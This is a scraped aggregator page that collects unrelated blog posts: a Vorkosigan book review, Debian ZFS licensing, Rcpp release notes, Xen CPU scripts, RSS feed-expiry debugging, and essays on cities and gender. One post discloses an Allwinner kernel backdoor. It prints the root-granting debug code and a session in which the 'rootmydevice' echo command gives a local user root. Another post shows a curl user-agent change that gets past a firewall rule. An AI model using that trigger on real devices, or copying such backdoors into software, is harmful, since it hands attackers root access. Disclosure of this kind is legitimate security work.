There is also a substantial retcon or reveal about an aspect of Miles's family that hasn't previously been mentioned. (Which term you use depends on whether you think Bujold has had this in mind all along. My money is on reveal.) I suspect some will find this revelation jarring and difficult to believe, but it worked perfectly for me. It felt like exactly the sort of thing that would go unnoticed by the other characters, particularly Miles: something that falls neatly into his blind spots and assumptions, but reads much differently to Cordelia. In general, one of the joys of this book for me is seeing Miles a bit wrong-footed and maneuvered by someone who simply isn't willing to be pushed by him.

One of the questions the Vorkosigan series has been asking since the start is whether anyone can out-maneuver Miles. Ekaterin only arguably managed it, but Gentleman Jole makes it clear that Miles is no match for his mother on her home turf.

This is a quiet and slow book that doesn't feel much like the rest of the series, but it worked fairly well for me. It's not up in the ranks of my favorite books of this series, partly because the way it played out was largely predictable and I never quite warmed to Jole, but Cordelia is delightful and seeing Miles from an outside perspective is entertaining. An odd entry in the series, but still recommended.

Rating: 7 out of 10

,

Planet DebianBits from Debian: What does it mean that ZFS is included in Debian?

Petter Reinholdtsen recently blogged about ZFS availability in Debian. Many people have worked hard on getting ZFS support available in Debian and we would like to thank everyone involved in getting to this point and explain what ZFS in Debian means.

The landing of ZFS in the Debian archive was blocked for years due to licensing problems. Finally, the inclusion of ZFS was announced slightly more than a year ago, in April 2015, by the DPL at the time, Lucas Nussbaum, who wrote "We received legal advice from Software Freedom Law Center about the inclusion of libdvdcss and ZFS in Debian, which should unblock the situation in both cases and enable us to ship them in Debian soon.". In January this year, the following DPL, Neil McGovern, blogged with a lot more details about the legal situation behind this and summarized it as "TLDR: It’s going in contrib, as a source only dkms module."

ZFS is not exactly available in Debian, since Debian is only what's included in the "main" section of the archive. What people really meant here is that the ZFS code is now included in "contrib" and it's available for users using DKMS.
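
In practice that means enabling the contrib section in sources.list and letting DKMS build the module against the local kernel, roughly along these lines (package names are from memory and may have changed; check apt-cache search zfs if in doubt):

$ sudo apt-get install zfs-dkms zfsutils-linux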

Many people also mixed this up with Ubuntu now including ZFS. However, Debian and Ubuntu are not doing the same thing: Ubuntu is shipping pre-built kernel modules directly, something that is considered to be a GPL violation. As the Software Freedom Conservancy wrote "while licensed under an acceptable license for Debian's Free Software Guidelines, also has a default use that can cause licensing problems for downstream Debian users".

Planet DebianSven Hoexter: Failing with F5: ASM default ruleset vs curl

Not sure what to say on days when the default ruleset of a "web application firewall" denies access for curl, and the circumvention is as complicated as:

alias curl-vs-asm="curl -A 'Mozilla'"

It starts to feel like I'm wasting my lifetime when I see something like that. Otherwise I like my job (that's without irony!).

Update: Turns out it's even worse. They specifically block curl. Even

curl -A 'A' https://wherever-asm-is-used.example

works.

Planet DebianNorbert Preining: Foreigners in Japan are evil …

…at least that is what Tokyo's Shinjuku ward believes. They have put out a very nice brochure about how to behave as a foreigner in Japan: English (local copy) and Japanese (local copy). Nothing in there is really bad, but the tendency is so clear that it makes me think – what on earth do you believe we are doing in this country?

Now what is so strange about that? If you have never lived in Japan you will probably not understand. But reading through this pamphlet I felt like a criminal from the first page on. If you don’t want to read through it, here is a short summary:

  • The first four pages (1-4) deal with manners, accompanied by penal warnings for misbehavior.
  • Pages 5-16 deal with criminal records, stating the terms of imprisonment and fines for odd offences.
  • Pages 17-19 deal with residence card, again paired with criminal activity listings and fines.
  • Pages 20-23 deal with reporting obligations, again ….
  • And finally page 24 gives you phone numbers for accidents, fires, injury, and general information.

So if you count up, we have 23 pages of warnings, and 1 (as in *one*) page of practical information. Do I need to add more about how we foreigners are considered in Japan?

Just a few points about details:

  • In the part on manner, not talking on the phone in public transport is mentioned – I have to say, after many years here I am still waiting to see the first foreigner talking on the phone loudly, while Japanese regularly chat away at high volume.
  • Again in the manner section, don’t make noise in your flat – well, I lived 3 years in an apartment where the one below me enjoyed playing loud music in the car till late in the night, as well as moving furniture at 3am.
  • Bicycle riding – ohhhh, bicycle riding – those 80+ people meandering around the street, and the school kids riding four abreast. But hey, we foreigners are required to behave differently. Not that any police officer ever stopped a Japanese school kid for that …
  • I just realized that I have been doing illegal things for a long time – withdrawing money using someone else’s cash card! Damned, it was my wife’s, but still, too bad 🙁

I accept the good intention of the Shinjuku ward to provide a bit of warning and guidance. But the way it was done speaks volumes about how we foreigners are treated – as second class.

Planet DebianJonathan Dowland: Announcement

It has become a bit traditional within Debian to announce these things in a geeky manner, so for now

# ed -p: /etc/exim4/virtual/dow.land
:a
holly: :fail: reserved for future use
.
:wq
99

More soon!

Planet DebianDirk Eddelbuettel: Rcpp 0.12.5: Yet another one

The fifth update in the 0.12.* series of Rcpp arrived on the CRAN network for GNU R a few hours ago, and was just pushed to Debian. This 0.12.5 release follows the 0.12.0 release from late July, the 0.12.1 release in September, the 0.12.2 release in November, the 0.12.3 release in January, and the 0.12.4 release in March --- making it the ninth release at the steady bi-monthly release frequency. This release is once again more of a maintenance release, addressing a number of small bugs, nuisances or documentation issues without adding any major new features.

Rcpp has become the most popular way of enhancing GNU R with C or C++ code. As of today, 662 packages on CRAN depend on Rcpp for making analytical code go faster and further. That is up by almost fifty packages from the last release in late March!

And as during the last few releases, we have new first-time contributors. Sergio Marques helped to enable compilation on Alpine Linux (with its smaller libc variant). Qin Wenfeng helped adapt for Windows builds under R 3.3.0 and the long-awaited new toolchain. Ben Goodrich fixed a (possibly ancient) Rcpp Modules bug he encountered when working with rstan. Another (recurrent) contributor, Dan Dillon, cleaned up an issue with Nullable and strings. Rcpp Core team members Kevin and JJ took care of a small build nuisance on Windows, and I added a new helper function, updated the skeleton generator and (finally) formally deprecated loadRcppModules() for which loadModule() has been preferred since around R 2.15 or so. More details and links are below.

Changes in Rcpp version 0.12.5 (2016-05-14)

  • Changes in Rcpp API:

    • The checks for different C library implementations now also check for Musl used by Alpine Linux (Sergio Marques in PR #449).

    • Rcpp::Nullable works better with Rcpp::String (Dan Dillon in PR #453).

  • Changes in Rcpp Attributes:

    • R 3.3.0 Windows with Rtools 3.3 is now supported (Qin Wenfeng in PR #451).

    • Correct handling of dependent file paths on Windows (use winslash = "/").

  • Changes in Rcpp Modules:

    • An apparent race condition in Module loading seen with R 3.3.0 was fixed (Ben Goodrich in #461 fixing #458).

    • The (older) loadRcppModules() is now deprecated in favour of loadModule() introduced around R 2.15.1 and Rcpp 0.9.11 (PR #470).

  • Changes in Rcpp support functions:

    • The Rcpp.package.skeleton() function was again updated in order to create a DESCRIPTION file which passes R CMD check without notes, warnings, or errors under R-release and R-devel (PR #471).

    • A new function compilerCheck can test for minimal g++ versions (PR #474).

Thanks to CRANberries, you can also look at a diff to the previous release. As always, even fuller details are on the Rcpp Changelog page and the Rcpp page which also leads to the downloads page, the browseable doxygen docs and zip files of doxygen output for the standard formats. A local directory has source and documentation too. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

,

Planet DebianAntoine Beaupré: Long delays posting Debian Planet Venus

For the last few months, it seems that my posts haven't been reaching the Planet Debian aggregator correctly. I timed the last two posts and they both arrived roughly 10 days late in the feed.

SNI issues

At first, I suspected I was a victim of the SNI bug in Planet Venus: since it is still running in Python 2.7 and uses httplib2 (as opposed to, say, Requests), it has trouble with sites running under SNI. In January, there were 9 blogs with that problem on Planet. When this was discussed elsewhere in February, there were now 18, and then 21 reported in March. With everyone enabling (like me) Let's Encrypt on their website, this number is bound to grow.
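
As an aside, a quick way to see whether a given site depends on SNI is to compare a TLS handshake with and without the servername extension; the hostname below is just an example:

$ openssl s_client -connect example.org:443 -servername example.org </dev/null
$ openssl s_client -connect example.org:443 </dev/null

A client that never sends SNI, as the old httplib2 stack does, gets whatever default certificate the server presents, and certificate verification then fails for SNI-only sites.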

I was able to reproduce the Debian Planet setup locally to do further tests and ended up sending two (unrelated) patches to the Debian bug tracker against Planet Venus, the software running Debian planet. In my local tests, I found 22 hosts with SNI problems. I also posted some pointers on how the code could be ported over to the more modern Requests and Cachecontrol modules.

Expiry issues

However, some of those feeds were working fine on philp, the host I found running as the Planet Master. Even more strange, my own website was working fine!

INFO:planet.runner:Feed https://anarc.at/tag/debian-planet/index.rss unchanged

Now that was strange: why was my feed fetched, but noted as unchanged? For that, I found that there was a FAQ question buried down in the PlanetDebian wiki page which explicitly said that Planet obeys Expires headers diligently and will not fetch content again until it has expired. Skeptical, I looked at my own headers and, ta-da! they were way off:

$ curl -v https://anarc.at/tag/debian-planet/index.rss 2>&1 | egrep  '< (Expires|Date)'
< Date: Sat, 14 May 2016 19:59:28 GMT
< Expires: Sat, 28 May 2016 19:59:28 GMT

So I lowered the expires timeout on my RSS feeds to 4 hours:

root@marcos:/etc/apache2# git diff
diff --git a/apache2/conf-available/expires.conf b/apache2/conf-available/expires.conf
index 214f3dd..a983738 100644
--- a/apache2/conf-available/expires.conf
+++ b/apache2/conf-available/expires.conf
@@ -3,8 +3,18 @@
   # Enable expirations.
   ExpiresActive On

-  # Cache all files for 2 weeks after access (A).
-  ExpiresDefault A1209600
+  # Cache all files 12 hours after access
+  ExpiresDefault "access plus 12 hours"
+
+  # RSS feeds should refresh more often
+  <FilesMatch \.(rss)$>
+    ExpiresDefault "modification plus 4 hours"
+  </FilesMatch> 
+
+  # images are *less* likely to change
+  <FilesMatch "\.(gif|jpg|png|js|css)$">
+    ExpiresDefault "access plus 1 month"
+  </FilesMatch>

   <FilesMatch \.(php|cgi)$>
     # Do not allow scripts to be cached unless they explicitly send cache

I also lowered the general cache expiry, except for images, Javascript and CSS.

Planet Venus maintenance

A small last word about all this: I'm surprised to see that Planet Debian is running 6-year-old software that hasn't seen a single official release yet, with local patches on top. It seems that Venus is well designed, I must give them that, but it's a little worrisome to see great software just rotting away like this.

A good "planet" site seems like a resource a lot of FLOSS communities would need: is there another "Planet-like" aggregator out there that is well maintained and more reliable? In Python, preferably.

PlanetPlanet, which Venus was forked from, is out of the question: it is even less maintained than the new fork, which itself seems to have died in 2011.

There is a discussion about the state of Venus on Github which reflects some of the concerns expressed here, as well as on the mailing list. The general consensus seems to be that everyone should switch over to Planet Pluto, which is written in Ruby.

I am not sure which planet Debian sits on - Pluto? Venus? Besides, Pluto is not even a planet anymore...

Mike check!

So this is also a test to see if my posts reach Debian Planet correctly. I suspect no one will ever see this at the top of their feeds, since the posts do get there, but with a 10-day delay and with the original date, so they are "sunk" down. The above expiration fixes won't take effect until the 10-day delay is over... But if you did see this as noise, retroactive apologies in advance for the trouble.

If you are reading this from somewhere else and wish to say hi, don't hesitate, it's always nice to hear from my readers.

Planet DebianThadeu Lima de Souza Cascardo: Chromebook Trackpad

Three years ago, I wanted to get a new laptop. I wanted something that could run free software, preferably without blobs, with a good amount of RAM, a good battery and very light, something I could carry along with a work laptop. And I didn't want to spend too much. I don't want to make this too long, so in the end, I asked in the store for anything that didn't come with Windows installed, and before I was dragged into the Macbook section, I shouted "and no Apple!". That's how I got into the Chromebook section with two options before me.

There was the Chromebook Pixel, too expensive for me, and the Samsung Chromebook, using ARM. Getting a laptop with an ARM processor was interesting for me, because I like playing with different stuff. I looked up whether it would be possible to run something other than ChromeOS on it, got the sense that it would, and made the call. It does not have too much RAM, but it was cheap. I got an external HD to compensate for the lack of storage (only 16GB eMMC), and that was it.

Wifi does require non-free firmware to be loaded, but booting was a nice surprise. It is not perfect, but I will see if I can get to that another day.

I managed to get Fedora installed, downloading chunks of an image that I could write into the storage. After a while, I backed up home, and installed Debian using debootstrap.

Recently, after an upgrade from wheezy to jessie, things stopped working. systemd would not mount the most basic partitions and would simply stop very early in the boot process. That's a story on my backlog as well, that I plan to tell soon, since I believe this connects with supporting Debian on mobile devices.

After fixing some things, I decided to try libinput instead of synaptics for the Trackpad. The Chromebook uses a Cypress APA Trackpad. The driver was upstreamed in Linux 3.9. Chrome OS ships with Linux 3.4, but had the driver in its branch.

After changing to libinput, I realized clicking did not work. Neither did tapping. I moved back to synaptics, and was reminded things didn't work too well with that either. I always had to enable tapping.

I have some experience with input devices. I wrote drivers, small applications reacting to some events, and some uinput userspace drivers as well. I like playing with that subsystem a lot. But I don't have too much experience with multitouch and libinput is kind of new for me too.

I got my hands on the code and found out there is libinput-debug-events. It will show you how libinput translates evdev events. I clicked on the Trackpad and got nothing but some pointer movements. I tried evtest and there were some multitouch events I didn't understand too well, but it looked like there were important events there that I thought libinput should have recognized.

I tried reading some of libinput's code, but didn't get too far before I tried something else. But then, I had to leave this exercise for another day. Today, I decided to do it again. Now, with some fresh eyes, I looked at the driver code. It showed support for left, right and middle buttons. But maybe my device doesn't support it, because I don't remember seeing it on evtest when clicking the Trackpad. I also understood better the other multitouch events: they were just saying how many fingers there were and what the position of each one was. In the case of a single finger, you still get an identifier. For better understanding of all this, reading Documentation/input/event-codes.txt and Documentation/input/multi-touch-protocol.txt is recommended.

So, in trying to answer whether libinput needs to handle my device's events properly, or handle my device specially, or whether the driver requires changes, or what else I can do to have a better experience with this Trackpad, things were pointing towards the driver and the device. Then, after running evtest, I noticed a BTN_LEFT event. OK, so the device and driver support it, what is libinput doing with that? Running evtest and libinput-debug-events at the same time, I found out the problem. libinput was handling BTN_LEFT correctly, but the driver was not reporting it all the time.

By going through the driver, it looks like this is either a firmware or a hardware problem. When you get the click response, sound and everything, the driver will not always report it. It could be pressure or electrical contact; I can't tell for sure. But the driver does not check for anything but what the firmware has reported, so it's not the driver.

A very interesting thing I found out is that you can read and write the firmware. I dumped it to a file, but still could not analyze what it is. There are some commands to put the driver into some bootloader state, so maybe it's possible to play with the firmware without bricking the device, though I am not sure yet. Even then, the problem might not be fixable by just changing the firmware.

So, I was left with the possibility of using tapping, which was not working with libinput. Grepping through the code and the libinput documentation, I found out that tapping needs to be enabled. The libinput xorg driver supports that. Just set the Tapping option to true and that's it.
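Concretely, that amounts to an xorg snippet along these lines (the file path and identifier are just examples):

# e.g. /etc/X11/xorg.conf.d/40-libinput.conf
Section "InputClass"
        Identifier "libinput touchpad: enable tapping"
        MatchIsTouchpad "on"
        MatchDriver "libinput"
        Option "Tapping" "true"
EndSection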

So, now I am a happy libinput user, with some of the same issues I had before with synaptics, but that's something you get used to. And I have a new firmware in front of me that maybe we could tackle by some reverse engineering.

Planet Linux AustraliaColin Charles: London roadshow wrap-up, see you in Paris next week

Just a few days ago, I presented at the MariaDB Roadshow in London, and I had a lot of fun. While I had canned slides, I did know the topic intimately well, so it was good to get further in-depth. In addition, we had these MasterMind sessions, basically the place to get one-on-one time with Anders, Luisa, or me. I noticed that pretty much everyone said they were buying services afterwards (which more or less must mean the event was rather successful from that standpoint!).

In addition to that, I was happy to see that from attendee feedback, I did have the highest averages – thank you!

So here’s to repeating this in Paris next week — Gestion des données pour les applications vitales – MariaDB Roadshow Paris. I look forward to seeing you there, and I know we are repeating the MasterMind sessions. To fine-tune it, try to bring as much information as you possibly can so our time can be extremely effective.

Planet Linux AustraliaTim Serong: The Politics of Resentment

I’ve been reading The Archdruid Report regularly for a long time now, because unlike me, John Michael Greer posts every week and always writes something interesting. Given that we’ve got a federal election coming up in Australia and that I’ve mentioned one of JMG’s notions on the current state of politics to several people over the last few months, I thought I’d provide a TL;DR here:

If you want, you can split people in the US into four classes, based on how they get most of their income:

  1. The investment class (income derived from returns on investment)
  2. The salary class (who receive a monthly salary)
  3. The wage class (who receive an hourly wage)
  4. The welfare class (who receive welfare payments)

According to JMG, over the last fifty years or so, three of these classes of people have remained roughly where they are; the investment class still receives returns on investment (modulo a recession or two), the salary class still draws a reasonable salary, and life still sucks for people on welfare. But the wage class, to be blunt, has been systematically fucked over this time period. There’s a lot of people there, and it’s this disenfranchised group who sees someone outside the political establishment status quo (Trump) as someone they can get behind. Whether or not Trump is elected in the US, there’s still going to be a whole lot of people out there pissed off with the current state of things, and it’s going to be really interesting to see how this plays out.

You should probably go read the full post, because I doubt I’ve done it justice here, but I don’t think it’s unreasonable to imagine the same (or a similar) thesis might be valid for Australia, so my question is: what, if anything, does this mean for our 2016 federal election?

Planet DebianRussell Coker: Xen CPU Use per Domain again

8 years ago I wrote a script to summarise Xen CPU use per domain [1]. Since then changes to Xen required changes to the script. I have new versions for Debian/Wheezy (Xen 4.1) and Debian/Jessie (Xen 4.4).

Here’s a new script for Debian/Wheezy:

#!/usr/bin/perl
use strict;

open(LIST, "xm list --long|") or die "Can't get list";

my $name = "Dom0";
my $uptime = 0.0;
my $cpu_time = 0.0;
my $total_percent = 0.0;
my $cur_time = time();

open(UPTIME, "</proc/uptime") or die "Can't open /proc/uptime";
my @arr = split(/ /, <UPTIME>);
$uptime = $arr[0];
close(UPTIME);

my %all_cpu;

while(<LIST>)
{
  chomp;
  if($_ =~ /^\)/)
  {
    my $cpu = $cpu_time / $uptime * 100.0;
    if($name =~ /Domain-0/)
    {
      printf("%s uses %.2f%% of one CPU\n", $name, $cpu);
    }
    else
    {
      $all_cpu{$name} = $cpu;
    }
    $total_percent += $cpu;
    next;
  }
  $_ =~ s/\).*$//;
  if($_ =~ /start_time /)
  {
    $_ =~ s/^.*start_time //;
    $uptime = $cur_time - $_;
    next;
  }
  if($_ =~ /cpu_time /)
  {
    $_ =~ s/^.*cpu_time //;
    $cpu_time = $_;
    next;
  }
  if($_ =~ /\(name /)
  {
    $_ =~ s/^.*name //;
    $name = $_;
    next;
  }
}
close(LIST);

sub hashValueDescendingNum {
  $all_cpu{$b} <=> $all_cpu{$a};
}

my $key;

foreach $key (sort hashValueDescendingNum (keys(%all_cpu)))
{
  printf("%s uses %.2f%% of one CPU\n", $key, $all_cpu{$key});
}

printf("Overall CPU use approximates %.1f%% of one CPU\n", $total_percent);

Here’s the script for Debian/Jessie:

#!/usr/bin/perl

use strict;

open(UPTIME, "xl uptime|") or die "Can't get uptime";
open(LIST, "xl list|") or die "Can't get list";

my %all_uptimes;

while(<UPTIME>)
{
  chomp $_;

  next if($_ =~ /^Name/);
  $_ =~ s/ +/ /g;

  my @split1 = split(/ /, $_);
  my $dom = $split1[0];
  my $uptime = 0;
  my $time_ind = 2;
  if($split1[3] eq "days,")
  {
    $uptime = $split1[2] * 24 * 3600;
    $time_ind = 4;
  }
  my @split2 = split(/:/, $split1[$time_ind]);
  $uptime += $split2[0] * 3600 + $split2[1] * 60 + $split2[2];
  $all_uptimes{$dom} = $uptime;
}
close(UPTIME);

my $total_percent = 0;

while(<LIST>)
{
  chomp $_;

  my $dom = $_;
  $dom =~ s/ .*$//;

  if ( $_ =~ /(\d+)\.[0-9]$/ )
  {
    my $percent = $1 / $all_uptimes{$dom} * 100.0;
    $total_percent += $percent;
    printf("%s uses %.2f%% of one CPU\n", $dom, $percent);
  }
  else
  {
    next;
  }
}

printf("Overall CPU use approximates  %.1f%% of one CPU\n", $total_percent);

Planet DebianMichal Čihař: Fifteen years with phpMyAdmin and free software

Today it's fifteen years since my first contribution to free software. I've changed several jobs since that time, all of them involved quite a lot of free software, and now I'm fully working on free software.

The first contribution happened to be on phpMyAdmin and consisted of a Czech translation:

Subject: Updated Czech translation of phpMyAdmin
From: Michal Cihar <cihar@email.cz>
To: swix@users.sourceforge.net
Date: Mon, 14 May 2001 11:23:36 +0200
X-Mailer: KMail [version 1.2]

Hi

I've updated (translated few added messages) Czech translation of phpMyAdmin. 
I send it to you in two encodings, because I thing that in distribution 
should be included version in ISO-8859-2 which is more standard than Windows 
1250.

Regards
    Michal Cihar

Many other contributions came afterwards, several projects died on the way, but it has been a great ride so far. To see some of these you can look at my software page which contains both current and past projects and also includes tools I created earlier (mostly for Windows) and open-sourced later.

These days you can find me being active on phpMyAdmin, Gammu, python-gammu and Wammu, Debian and Weblate.

Filed under: Debian English phpMyAdmin SUSE | 2 comments

Planet DebianGunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems

In the ARM world, to which I am still mostly a newcomer (although I've been already playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed.

Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux.

In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingeniería, UNAM. It has been quite successful — and fun.

Anyway, one of the points we emphasize to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot an irony.

As part of the "Linux Userspace" and "Boot process" modules, we place a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system:

  • Using our trusty Debian Installer in the (unfortunately few) devices where it is supported
  • Installing via Debootstrap, as I did in my CuBox-i tutorial (note that the tutorial is nowadays obsolete. The CuBox-i can boot with Debian Installer!) and just keeping the boot partition (both for u-boot and for the kernel) of the vendor-provided install
  • Building a barebones system using the great Buildroot set of scripts and hacks
  • Downloading a full, but minimal, installed image, such as OpenWRT (I have yet to see what's there about its fork, LEDE)

Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... The people we already know and trust to do this kind of work!

Most current ARM chips cannot run with the stock, upstream Linux kernel. They require a set of patches that different vendors pile up to support their basic hardware (remember those systems are almost always systems-on-a-chip (SoC)). Some vendors do take the hard work to try to upstream their changes — that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it.

So, in many cases, we are stuck running with nonstandard kernels, full with huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right?

Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel.

This kernel has a very ugly flaw: A debugging mode left open, that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:

  Debian GNU/Linux 8 bananapi ttyS0

  banana login: gwolf
  Password:

  Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
  Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l

  The programs included with the Debian GNU/Linux system are free software;
  the exact distribution terms for each program are described in the
  individual files in /usr/share/doc/*/copyright.

  Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  permitted by applicable law.

  gwolf@banana:~$ id
  uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
  gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
  gwolf@banana:~$ id
  groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)

Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):

  if(!strncmp("rootmydevice",(char*)buf,12)){
          cred = (struct cred *)__task_cred(current);
          cred->uid = 0;
          cred->gid = 0;
          cred->suid = 0;
          cred->euid = 0;
          cred->euid = 0;
          cred->egid = 0;
          cred->fsuid = 0;
          cred->fsgid = 0;
          printk("now you are root\n");
  }

Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines — the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files suffer from this same basic issue — and having this upstreamed will become a titanic task. If their programmers tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work.

Anyway, enough said by me. Some other sources of information:

There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

,

TEDBenjamin Barber’s idea of a Global Parliament of Mayors to become reality in September

In the face of global crises like climate change and refugee migration, it seems sometimes that nation-states are hopelessly gridlocked and unable to act. At TEDGlobal 2013, political theorist Benjamin Barber laid out a counter-proposal: Go local. Big cities are demonstrating a remarkable capacity to govern themselves democratically and efficiently in networks, both locally and globally. They share certain unique qualities that can elude bigger entities: pragmatism, civic trust, participation, creativity and cooperation. Mayors implement practical change every day. So, Barber suggests, we should give mayors more power — including with big global issues.

In Barber’s 2014 book If Mayors Ruled the World: Dysfunctional Nations, Rising Cities, he proposes the Global Parliament of Mayors, a global governance platform that brings together collective urban political power. Now, it’s become a reality. From September 10–12, some 100 mayors of major cities and representatives of urban networks will meet in The Hague.

In this Q&A, Barber shares details on the need for a Global Parliament of Mayors, the upcoming gathering, and what it took to turn this dream into a reality.

Professor Barber, give us the cheat sheet on the Global Parliament of Mayors: Why is it needed?

Traditional nation-states and international organizations have become less able to discharge their sovereign responsibility to secure the lives, liberties and property of their citizens, especially in the face of existential threats like climate change. It’s a sort of sovereign default, and it has left cities to carry the responsibility for sustainability and other global goods. For that, they need a global urban governance network that is both democratic and efficient — something that goes further than the urban networks we already have. Namely, a Global Parliament of Mayors that can offer cities a megaphone for their collective urban voice and a platform for common urban policy-making.

You are basically making a counterintuitive claim that, in a globalizing world, democracy’s best hope is not found in a global government, but locally in cities.

It is only counterintuitive if you assume local and global are antonyms. But in the new world of interdependence, local problems are global problems, and municipal goods are global goods. Think about refugees, pandemic disease, inequality, crime, markets, terrorism and of course, climate change: these are all global challenges that manifest themselves locally in cities. Problems and solutions today are “glocal”: at once both local and global. Indeed, the irony is that states tend to be bordered, insulated and parochial, while cities have become open, transactional, urbane and cosmopolitan — the carrier of universal values. That is why urban networks have been more successful in addressing global challenges than nation-states.

Who will participate in the Hague gathering?

Because it is the inaugural convening of a new democratic governance body with a global compass, we are gathering representatives of more than 100 cities from around the world, North and South, developed and developing, wealthy and poor, large and small — as few as 200,000 residents. We also seek representation by mayors, rather than their deputies, so that the crucial decisions have the full legitimacy of mayoral participation.

What was the journey from the idea of the GPM to actually convening it?

I proposed the governance body in the final chapter of my book If Mayors Ruled the World. Almost immediately following its publication and my TED Talk in 2013, I began to hear from sitting mayors, including those in Seoul, Los Angeles, London, Hamburg, Boston and elsewhere, inquiring about the idea with interest and enthusiasm. This interest resulted in planning meetings in Seoul with Mayor Park Won-soon, in New York City with the publication CityLab and in Amsterdam with several mayors in The Netherlands, including Mayor Eberhard van der Laan, Mayor Ahmed Aboutaleb and Mayor Jozias van Aartsen. In the summer of 2015, Mayor van Aartsen proposed that The Hague be the site for the inaugural convening in September 2016. The process, led by visionary mayors, was laborious but unwavering, animated by our small GPM team in New York and facilitated by our advisory committee and the City of The Hague.

How is the event structured? What kind of discussions will take place?

Over a three-day weekend, we will hold four parliamentary sessions, starting with three plenaries, on climate change (“The City and Nature”), refugees (“Arrival Cities”) and governance (“The City and Democracy”). Each plenary will aim to put a few key practical proposals for common action on the table. Proposals will call for opt-in by individual cities, rather than top-down imperatives, and will be prepared in advance by our Advisory Committee, with mayors debating and amending them with the assistance of experts from relevant urban networks, such as the C40 Climate Cities and EFUS (the European Forum for Urban Security). A final plenary session will offer the opportunity for formal ratification of agreed-upon proposals.

What do you hope happens during this inaugural gathering?

The two principal aims of the GPM are to establish the legitimacy and continuity of the new global organization of mayors as a governance body — including future meetings and a digital platform where mayors can meet online — and to demonstrate the capacity of cities to establish common policies in critical domains, such as climate change and refugees, that can serve their citizens when nation-states are gridlocked and unable to act. Cities have both a responsibility and a right to act on behalf of their citizens in critical areas of sustainability and liberty when states do not or cannot act. Some mayors are willing to act autonomously while others prefer a model of full cooperation with states. Yet in the end, citizens have a right to life and liberty and sustainability too, which means that cities have a right to govern on their behalf when that is the only road to sustainability. The argument is laid out in our document “Declaration of the Rights of Cities and Citizens.”

You have a new book coming out early next year. Can you give us a preview?

It will be titled Cool Cities: Urban Sustainability in a Warming World, from Yale Press. It is a kind of sequel to the previous book and looks at the role cities have played in combating climate change through existing urban networks like the C40 Climate and ICLEI and in the new Global Parliament of Mayors. It makes the case for mayors governing collaboratively to curb greenhouse gases and promote decarbonization. And it shows that they can go well beyond the COP21 agreement reached in Paris last December in getting real results.

Watch Benjamin Barber’s TEDGlobal talk proposing the Global Parliament of Mayors >>


Sociological ImagesCompulsory Monogamy in The Hunger Games

Assigned: Life with Gender is a new anthology featuring blog posts by a wide range of sociologists writing at The Society Pages and elsewhere. To celebrate, we’re re-posting four of the essays as this month’s “flashback Fridays.” Enjoy! And to learn more about this anthology, a companion to Wade and Ferree’s Gender: Ideas, Interactions, Institutions, please click here.

Compulsory Monogamy in The Hunger Games, by Mimi Schippers, PhD

NPR’s Linda Holmes wrote a great article about the gender dynamics in The Hunger Games: Catching Fire and concluded, “…you could argue that Katniss’ conflict between Peeta and Gale is effectively a choice between a traditional Movie Girlfriend and a traditional Movie Boyfriend.”  I do love the way Holmes puts this.  Gender, it seems, is not what one is, but what one does.  Different characteristics we associate with masculinity and femininity are available to everyone, and when Peeta embodies some characteristics we usually see only in women’s roles, Peeta becomes the Movie Girlfriend despite being a boy.

Though I find this compelling, I want to take a moment to focus on the other part of this sentence… the part when Holmes frames Katniss’ relationship to Peeta and Gale as a “conflict between” and a “choice.”  I think that, in some ways, the requirement to choose one or the other forces Katniss to, not only “choose” a boyfriend, but also to choose gender—for herself.

Depending on whether she’s relating to Peeta or Gale, she is either someone who takes charge, is competent in survival, and protects her partner (traditionally the masculine role) or someone who lets another lead and nurtures instead of protects (the feminine role).  As Candace West and Don Zimmerman suggested many years ago in their article “Doing Gender,” we do gender in relationship to other people.  It’s a conversation or volley in which we’re expected to play the part to the way others are doing gender.

